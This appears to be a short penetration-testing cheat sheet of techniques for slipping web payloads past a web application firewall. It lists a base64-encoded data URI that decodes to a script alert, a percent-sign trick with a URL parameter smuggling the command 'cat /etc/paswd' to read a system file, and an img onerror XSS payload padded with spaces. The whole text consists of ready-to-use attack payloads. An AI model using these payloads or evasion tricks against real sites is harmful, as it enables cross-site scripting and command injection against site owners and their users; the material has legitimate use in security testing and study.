Generic techniques
- Base64 encoding our payload (/?q=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=_)
- ASPX removes % not followed by two hex characters (https://site.com/index.php?%file=cat /etc/paswd)
- We can use spaces to fool a WAF (<Img src = x onerror = “javascript: window.onerror = alert; throw XSS”>)